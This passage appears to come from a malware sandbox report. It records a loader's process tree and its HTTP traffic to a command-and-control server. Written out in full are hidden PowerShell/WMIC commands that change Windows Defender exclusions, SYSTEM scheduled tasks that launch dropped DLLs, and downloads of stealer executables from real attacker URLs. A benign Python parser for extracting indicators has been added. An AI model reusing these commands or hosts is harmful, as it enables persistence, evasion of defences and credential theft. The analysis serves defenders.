                                                                                                                                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                                  6⤵
                                                                                                                                  • Command and Scripting Interpreter: PowerShell
                                                                                                                                  • Drops file in System32 directory
                                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                  PID:2572
                                                                                                                                  • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                                                    "C:\Windows\system32\gpupdate.exe" /force
                                                                                                                                    7⤵
                                                                                                                                      PID:832
                                                                                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                              schtasks /DELETE /F /TN "bmbXFarNlpbNUcjZUs"
                                                                                                                              3⤵
                                                                                                                                PID:2168
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
                                                                                                                                3⤵
                                                                                                                                  PID:2560
                                                                                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                    forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
                                                                                                                                    4⤵
                                                                                                                                    • Indirect Command Execution
                                                                                                                                    PID:1528
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                      5⤵
                                                                                                                                        PID:1868
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                          6⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          • Drops file in System32 directory
                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                          PID:2020
                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
                                                                                                                                            7⤵
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:1604
                                                                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                                      forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
                                                                                                                                      4⤵
                                                                                                                                      • Indirect Command Execution
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:1468
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                        5⤵
                                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                                        PID:796
                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                          powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                          6⤵
                                                                                                                                          • Command and Scripting Interpreter: PowerShell
                                                                                                                                          PID:756
                                                                                                                                          • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                                                                                            "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
                                                                                                                                            7⤵
                                                                                                                                              PID:1032
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\kVyftiaSU\QwjSJr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "HlGMqKYvccXUYlk" /V1 /F
                                                                                                                                      3⤵
                                                                                                                                      • Drops file in Windows directory
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                      PID:1304
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /CREATE /TN "HlGMqKYvccXUYlk2" /F /xml "C:\Program Files (x86)\kVyftiaSU\SIqgEfJ.xml" /RU "SYSTEM"
                                                                                                                                      3⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                      PID:2904
                                                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                      schtasks /END /TN "HlGMqKYvccXUYlk"
                                                                                                                                      3⤵
                                                                                                                                        PID:2392
                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                        schtasks /DELETE /F /TN "HlGMqKYvccXUYlk"
                                                                                                                                        3⤵
                                                                                                                                          PID:892
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "jcvlsaWlukqsKE" /F /xml "C:\Program Files (x86)\vECSWYHhNEBU2\MMtAEvz.xml" /RU "SYSTEM"
                                                                                                                                          3⤵
                                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:1552
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "DNmCZKMScDllc2" /F /xml "C:\ProgramData\NUEAEvpmbtRdsZVB\zHFWLzh.xml" /RU "SYSTEM"
                                                                                                                                          3⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:2512
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "SebvePPLQQlbTkynf2" /F /xml "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR\vMxVtgP.xml" /RU "SYSTEM"
                                                                                                                                          3⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:796
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "BvByqijJTTwWPkViWve2" /F /xml "C:\Program Files (x86)\EKfHLQOzikZzC\agSfxQf.xml" /RU "SYSTEM"
                                                                                                                                          3⤵
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:1252
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /CREATE /TN "hjqxuCHRKqyyPIyfi" /SC once /ST 03:37:22 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\VLvKqTazivYGshTO\lEQZCeVN\bhXaBQO.dll\",#1 /kdidGeF 385121" /V1 /F
                                                                                                                                          3⤵
                                                                                                                                          • Drops file in Windows directory
                                                                                                                                          • Scheduled Task/Job: Scheduled Task
                                                                                                                                          PID:2848
                                                                                                                                        • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                          schtasks /run /I /tn "hjqxuCHRKqyyPIyfi"
                                                                                                                                          3⤵
                                                                                                                                            PID:1616
                                                                                                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                            schtasks /DELETE /F /TN "cszbzSIAjSjUwyOsr"
                                                                                                                                            3⤵
                                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                                            PID:2256
                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2300 -s 1548
                                                                                                                                            3⤵
                                                                                                                                            • Loads dropped DLL
                                                                                                                                            • Program crash
                                                                                                                                            PID:1876
                                                                                                                                        • C:\Windows\system32\rundll32.EXE
                                                                                                                                          C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VLvKqTazivYGshTO\lEQZCeVN\bhXaBQO.dll",#1 /kdidGeF 385121
                                                                                                                                          2⤵
                                                                                                                                            PID:2244
                                                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                              C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VLvKqTazivYGshTO\lEQZCeVN\bhXaBQO.dll",#1 /kdidGeF 385121
                                                                                                                                              3⤵
                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                              • Loads dropped DLL
                                                                                                                                              • Drops file in System32 directory
                                                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                                                              • Enumerates system info in registry
                                                                                                                                              • Modifies data under HKEY_USERS
                                                                                                                                              PID:1512
                                                                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                schtasks /DELETE /F /TN "hjqxuCHRKqyyPIyfi"
                                                                                                                                                4⤵
                                                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                                                PID:1492
                                                                                                                                        • C:\Windows\system32\gpscript.exe
                                                                                                                                          gpscript.exe /RefreshSystemParam
                                                                                                                                          1⤵
                                                                                                                                            PID:2180
                                                                                                                                          • C:\Windows\system32\gpscript.exe
                                                                                                                                            gpscript.exe /RefreshSystemParam
                                                                                                                                            1⤵
                                                                                                                                              PID:2432
                                                                                                                                            • C:\Windows\system32\gpscript.exe
                                                                                                                                              gpscript.exe /RefreshSystemParam
                                                                                                                                              1⤵
                                                                                                                                                PID:2488

Network

• flag-ru
  POST
  http://185.215.113.16/Jo89Ku7d/index.php
  axplong.exe
  Remote address:
  185.215.113.16:80
  Request
  POST /Jo89Ku7d/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.16
  Content-Length: 4
  Cache-Control: no-cache
  Response
  HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:37 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Refresh: 0; url = Login.php
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 156
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:37 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:39 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.16/inc/crypteda.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                GET /inc/crypteda.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:39 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 1165824
                                                                                                                                                Last-Modified: Thu, 12 Sep 2024 13:56:33 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                ETag: "66e2f311-11ca00"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:40 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:42 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.16/inc/stealc_default2.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                GET /inc/stealc_default2.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:42 GMT
                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                Content-Length: 192000
                                                                                                                                                Last-Modified: Sat, 24 Aug 2024 14:58:01 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                ETag: "66c9f4f9-2ee00"
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:43 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:01:57 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:00 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
• flag-ru  GET http://185.215.113.16/inc/penis.exe  (axplong.exe)
Remote address: 185.215.113.16:80
Request
  GET /inc/penis.exe HTTP/1.1
  Host: 185.215.113.16
Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Mon, 16 Sep 2024 05:02:00 GMT
  Content-Type: application/octet-stream
  Content-Length: 506368
  Last-Modified: Tue, 10 Sep 2024 19:10:31 GMT
  Connection: keep-alive
  ETag: "66e099a7-7ba00"
  Accept-Ranges: bytes
• flag-ru  POST http://185.215.113.16/Jo89Ku7d/index.php  (axplong.exe)
Remote address: 185.215.113.16:80
Request
  POST /Jo89Ku7d/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.16
  Content-Length: 31
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Mon, 16 Sep 2024 05:02:02 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
• flag-ru  GET http://185.215.113.16/inc/bundle.exe  (axplong.exe)
Remote address: 185.215.113.16:80
Request
  GET /inc/bundle.exe HTTP/1.1
  Host: 185.215.113.16
Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Mon, 16 Sep 2024 05:02:02 GMT
  Content-Type: application/octet-stream
  Content-Length: 311296
  Last-Modified: Fri, 06 Sep 2024 02:12:34 GMT
  Connection: keep-alive
  ETag: "66da6512-4c000"
  Accept-Ranges: bytes
• flag-ru  POST http://185.215.113.16/Jo89Ku7d/index.php  (axplong.exe)
Remote address: 185.215.113.16:80
Request
  POST /Jo89Ku7d/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.16
  Content-Length: 31
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Mon, 16 Sep 2024 05:02:03 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
• flag-ru  GET http://185.215.113.16/dobre/acentric.exe  (axplong.exe)
Remote address: 185.215.113.16:80
Request
  GET /dobre/acentric.exe HTTP/1.1
  Host: 185.215.113.16
Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Mon, 16 Sep 2024 05:02:03 GMT
  Content-Type: application/octet-stream
  Content-Length: 464896
  Last-Modified: Sat, 07 Sep 2024 22:52:49 GMT
  Connection: keep-alive
  ETag: "66dcd941-71800"
  Accept-Ranges: bytes
• flag-ru  POST http://185.215.113.16/Jo89Ku7d/index.php  (axplong.exe)
Remote address: 185.215.113.16:80
Request
  POST /Jo89Ku7d/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.16
  Content-Length: 31
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Mon, 16 Sep 2024 05:02:04 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
• flag-ru  GET http://185.215.113.16/inc/2.exe  (axplong.exe)
Remote address: 185.215.113.16:80
Request
  GET /inc/2.exe HTTP/1.1
  Host: 185.215.113.16
Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Mon, 16 Sep 2024 05:02:05 GMT
  Content-Type: application/octet-stream
  Content-Length: 689664
  Last-Modified: Mon, 05 Aug 2024 00:09:39 GMT
  Connection: keep-alive
  ETag: "66b01843-a8600"
  Accept-Ranges: bytes
• flag-ru  POST http://185.215.113.16/Jo89Ku7d/index.php  (axplong.exe)
Remote address: 185.215.113.16:80
Request
  POST /Jo89Ku7d/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.16
  Content-Length: 31
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Mon, 16 Sep 2024 05:02:06 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
• flag-ru  GET http://185.215.113.16/dobre/splwow64.exe  (axplong.exe)
Remote address: 185.215.113.16:80
Request
  GET /dobre/splwow64.exe HTTP/1.1
  Host: 185.215.113.16
Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Mon, 16 Sep 2024 05:02:06 GMT
  Content-Type: application/octet-stream
  Content-Length: 1381143
  Last-Modified: Fri, 13 Sep 2024 12:59:12 GMT
  Connection: keep-alive
  ETag: "66e43720-151317"
  Accept-Ranges: bytes
• flag-ru  POST http://185.215.113.16/Jo89Ku7d/index.php  (axplong.exe)
Remote address: 185.215.113.16:80
Request
  POST /Jo89Ku7d/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.16
  Content-Length: 31
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Mon, 16 Sep 2024 05:02:08 GMT
  Content-Type: text/html; charset=UTF-8
  Transfer-Encoding: chunked
  Connection: keep-alive
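The exchanges above follow one loader cycle: axplong.exe POSTs a 31-byte form-encoded check-in to /Jo89Ku7d/index.php on 185.215.113.16, receives a chunked text/html answer, then GETs a follow-on executable from /inc/ or /dobre/, and repeats. The report does not show the request or response bodies, so nothing below interprets them. What follows is an added example, not part of the sandbox report or of the malware: a Python parser for this listing that extracts URLs and remote endpoints, labels each exchange by role, and checks each download's ETag against its Content-Length and Last-Modified. nginx's default ETag is hex(mtime)-hex(size), so a consistent ETag is a server-side fingerprint of the exact file served; all five downloads in this listing pass the check, and a different ETag for the same URL in another report means the operator rotated the payload. SAMPLE is a constructed, abridged copy of two of the exchanges shown here; HEAD_RE, classify, summarize and the other names are assumptions of this example.

```python
# Added example, not part of the sandbox report: parse the HTTP listing above
# into IOCs. SAMPLE is a constructed, abridged copy of two exchanges shown on
# this page; HEAD_RE, classify, summarize and the other names are mine.
import calendar
import re
from email.utils import parsedate_to_datetime

SAMPLE = """\
• flag-ru  GET http://185.215.113.16/inc/penis.exe  (axplong.exe)
Remote address: 185.215.113.16:80
Request
  GET /inc/penis.exe HTTP/1.1
  Host: 185.215.113.16
Response
  HTTP/1.1 200 OK
  Content-Type: application/octet-stream
  Content-Length: 506368
  Last-Modified: Tue, 10 Sep 2024 19:10:31 GMT
  ETag: "66e099a7-7ba00"
• flag-ru  POST http://185.215.113.16/Jo89Ku7d/index.php  (axplong.exe)
Remote address: 185.215.113.16:80
Request
  POST /Jo89Ku7d/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.16
  Content-Length: 31
Response
  HTTP/1.1 200 OK
  Content-Type: text/html; charset=UTF-8
"""

# Head of an exchange (method, URL, process, remote endpoint), matched against
# the joined head lines so a one-field-per-line layout and a compact one both parse.
HEAD_RE = re.compile(
    r"\b(GET|POST|HEAD|PUT)\s+(\S+)\s+\(?([^\s()]+)\)?\s+Remote address:\s*(\S+)")

def _headers(lines):
    # "Name: value" lines -> dict keyed by lower-cased header name
    pairs = (l.partition(":") for l in lines)
    return {n.strip().lower(): v.strip() for n, sep, v in pairs if sep}

def _parse_one(lines):
    req, resp = lines.index("Request"), lines.index("Response")
    m = HEAD_RE.search(" ".join(lines[:req]))
    if not m:
        raise ValueError("unrecognised exchange head: %r" % lines[:req])
    method, url, process, remote = m.groups()
    return {"method": method, "url": url, "process": process, "remote": remote,
            "request_headers": _headers(lines[req + 2:resp]),  # skip request line
            "response_headers": _headers(lines[resp + 2:])}    # skip status line

def parse_exchanges(text):
    # One exchange per "•" bullet; indentation and blank lines are ignored.
    exchanges, chunk = [], []
    for line in (l.strip() for l in text.splitlines()):
        if line.startswith("•") and chunk:
            exchanges.append(_parse_one(chunk))
            chunk = []
        if line:
            chunk.append(line)
    if chunk:
        exchanges.append(_parse_one(chunk))
    return exchanges

def nginx_etag_consistent(etag, content_length, last_modified):
    # nginx's default ETag is "<hex mtime>-<hex size>"; both halves must agree
    # with Last-Modified and Content-Length. Unparseable input counts as False.
    etag = re.sub(r"^W/", "", etag.strip())
    mtime_hex, _, size_hex = etag.strip('"').partition("-")
    try:
        mtime, size = int(mtime_hex, 16), int(size_hex, 16)
        lm = calendar.timegm(parsedate_to_datetime(last_modified).utctimetuple())
        return mtime == lm and size == int(content_length)
    except (ValueError, TypeError):
        return False

def classify(ex):
    # Roles seen in this listing: form-encoded POST check-ins, and GETs
    # answered with application/octet-stream (follow-on executables).
    req_ct = ex["request_headers"].get("content-type", "")
    resp_ct = ex["response_headers"].get("content-type", "")
    if ex["method"] == "POST" and req_ct.startswith("application/x-www-form-urlencoded"):
        return "c2-checkin"
    if ex["method"] == "GET" and resp_ct.startswith("application/octet-stream"):
        return "payload-download"
    return "other"

def summarize(text):
    # One record per exchange; downloads also carry size and the ETag check.
    records = []
    for ex in parse_exchanges(text):
        rh = ex["response_headers"]
        rec = {"role": classify(ex), "url": ex["url"],
               "remote": ex["remote"], "process": ex["process"]}
        if rec["role"] == "payload-download":
            rec["size"] = int(rh.get("content-length", "0"))
            rec["etag_ok"] = nginx_etag_consistent(
                rh.get("etag", ""), rec["size"], rh.get("last-modified", ""))
        records.append(rec)
    return records

def iocs(text):
    # Sorted unique URLs and remote endpoints, ready for a blocklist or hunt.
    recs = summarize(text)
    return sorted({r["url"] for r in recs}), sorted({r["remote"] for r in recs})
```

Paste the whole listing into `summarize()` to get one record per exchange; `iocs()` gives the deduplicated URL and endpoint lists. Content-Length is only the server's claim about the file, so compare it, and the hash, against the dropped file on disk, which this listing does not carry.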
• flag-ru  POST http://185.215.113.16/Jo89Ku7d/index.php  (axplong.exe)
Remote address: 185.215.113.16:80
Request
  POST /Jo89Ku7d/index.php HTTP/1.1
  Content-Type: application/x-www-form-urlencoded
  Host: 185.215.113.16
  Content-Length: 31
  Cache-Control: no-cache
Response
  HTTP/1.1 200 OK
  Server: nginx/1.18.0 (Ubuntu)
  Date: Mon, 16 Sep 2024 05:02:10 GMT
  Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                POST
                                                                                                                                                http://185.215.113.16/Jo89Ku7d/index.php
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.16:80
                                                                                                                                                Request
                                                                                                                                                POST /Jo89Ku7d/index.php HTTP/1.1
                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                Content-Length: 31
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                Date: Mon, 16 Sep 2024 05:02:13 GMT
                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                Connection: keep-alive
                                                                                                                                              • flag-ru
                                                                                                                                                GET
                                                                                                                                                http://185.215.113.117/inc/gold.exe
                                                                                                                                                axplong.exe
                                                                                                                                                Remote address:
                                                                                                                                                185.215.113.117:80
                                                                                                                                                Request
                                                                                                                                                GET /inc/gold.exe HTTP/1.1
                                                                                                                                                Host: 185.215.113.117
                                                                                                                                                Response
                                                                                                                                                HTTP/1.1 200 OK
